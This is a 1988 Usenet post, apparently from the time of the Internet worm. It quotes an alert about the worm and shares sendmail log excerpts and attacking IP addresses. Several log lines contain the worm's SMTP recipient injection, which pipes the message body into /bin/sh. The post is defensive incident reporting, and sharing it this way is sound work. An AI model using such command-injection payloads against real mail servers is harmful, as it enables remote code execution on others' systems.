Path: utzoo!attcan!uunet!husc6!mailrus!purdue!decwrl!ucbvax!ETN-WLV.EATON.COM!sms
From: sms@ETN-WLV.EATON.COM (Steven M. Schultz)
Newsgroups: comp.protocols.tcp-ip
Subject: (none)
Message-ID: <8811031657.AA02636@ETN-WLV.EATON.COM>
Date: 3 Nov 88 16:57:19 GMT
Sender: daemon@ucbvax.BERKELEY.EDU
Organization: The Internet
Lines: 40

> From: Peter E. Yee <yee@ames.arc.nasa.gov>
> Message-Id: <8811030728.AA18199@ames.arc.nasa.gov>
> Subject: Internet VIRUS alert
> 
> We are currently under attack from an Internet VIRUS.  It has hit UC Berkeley,
> UC San Diego, Lawrence Livermore, Stanford, and NASA Ames.  The virus comes in
> via SMTP, and then is able to attack all 4.3BSD and SUN (3.X?) machines.  It
> sends a RCPT TO that requests that its data be piped through a shell.
> ...
> 							-Peter Yee
> 							yee@ames.arc.nasa.gov
> 							ames!yee

	Before turning off various services I logged attempts from
	these addresses:

		128.15.0.76
		26.7.0.102
		128.49.16.91
		and
		128.9.1.2

	I am still seeing SMTP attempts from 26.7.0.102, the lines in
	the sendmail logfile look like this:

Nov  3 08:26:28 from=</dev/null>, size=1676, class=0
Nov  3 08:26:35 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,
Nov  3 08:46:37 from: 26.7.0.102.49412
Nov  3 08:46:57 message-id=<8811031646.AA02609@ETN-WLV.EATON.COM>
Nov  3 08:46:57 from=</dev/null>, size=1677, class=0
Nov  3 08:47:04 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:23,
Nov  3 08:50:46 from: 26.0.0.58.49924
Nov  3 08:51:02 message-id=<8811031650.AA02625@ETN-WLV.EATON.COM>
Nov  3 08:51:02 from=</dev/null>, size=1675,
Nov  3 08:51:08 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,

	Hmmm, there'a new one here - 26.0.0.58.  Hadn't seen that one yet.

	Steven M. Schultz
	sms@etn-wlv.eaton.com